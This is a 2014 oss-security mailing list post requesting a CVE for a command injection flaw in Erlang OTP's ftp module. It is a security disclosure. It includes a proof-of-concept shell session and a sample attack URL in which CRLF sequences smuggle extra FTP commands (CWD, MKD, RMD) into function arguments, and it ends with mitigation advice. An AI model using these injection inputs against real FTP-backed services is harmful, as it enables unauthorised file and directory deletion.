Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Date: Tue, 28 Jan 2014 22:48:41 +0100
From: Seba <argos83@...il.com>
To: cve-assign@...re.org, oss-security@...ts.openwall.com
Subject: CVE Request: Erlang OTP - ftp module - FTP Command Injection

Hi,

This has been reported to erlang-bugs mailing list:
http://erlang.org/pipermail/erlang-bugs/2014-January/003998.html

There is an FTP Command Injection vulnerability in the "ftp" module.

All those functions that write any string argument in the control
socket seem to be vulnerable:

user/3
user/4
account/2
cd/2
ls/2
nlist/2
rename/3
delete/2
mkdir/2
rmdir/2
recv/2
recv/3
recv_bin/2,
recv_chunk_start/2
send/3
send_bin/3
send_chunk_start/2
append_chunk_start/2
append/2
append/3
append_bin/3

Vulnerability Description
-------------------------

By injecting a \r\n sequence followed by a new command in a function
argument you get the ftp module to write the whole string in the
socket.

E.g. the following erlang shell session:

1> inets:start().
ok
2> {ok, Pid} = inets:start(ftpc, [{host, "127.0.0.1"}]).
{ok,<0.46.0>}
3> ftp:user(Pid, "anonymous", "password\r\nCWD pub\r\nMKD new_dir").
ok
4> ftp:cd(Pid, "/pub\r\nRMD new_dir\r\nPASV").
ok


Generates the following FTP session:

FTP command: Client "127.0.0.1", "USER anonymous"
FTP response: Client "127.0.0.1", "331 Please specify the password."
FTP command: Client "127.0.0.1", "PASS <password>"
FTP response: Client "127.0.0.1", "230 Login successful."
FTP command: Client "127.0.0.1", "CWD pub"
FTP response: Client "127.0.0.1", "250 Directory successfully changed."
FTP command: Client "127.0.0.1", "MKD new_dir"
FTP response: Client "127.0.0.1", "257 "/pub/new_dir" created"
FTP command: Client "127.0.0.1", "CWD /pub"
FTP response: Client "127.0.0.1", "250 Directory successfully changed."
FTP command: Client "127.0.0.1", "RMD new_dir"
FTP response: Client "127.0.0.1", "250 Remove directory operation successful."
FTP command: Client "127.0.0.1", "PASV"
FTP response: Client "127.0.0.1", "227 Entering Passive Mode
(127,0,0,1,130,161)."


Attack Scenario Example
-----------------------

A web server allow users to navigate and download documents.
Internally the web server connects to a private ftp server using OTP
"ftp" module.
An attacker might take advantage of the vulnerability to execute
actions that aren't supposed to be exposed. E.g. delete a directory by
requesting:

http://www.example.com/list_dir.yaws?dir=/docs/%0d%0aRMD+/docs

Tested on
---------
 - Erlang OTP: R15B03
 - Ubuntu 12.04 x86_64
 - FTP Sever: vsftpd


Mitigation
----------

Until this is fixed and the proper sanitization is implemented within
the ftp module, string arguments should get "\r" and "\n" removed
before being passed to these functions.


Sebastián Tello

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.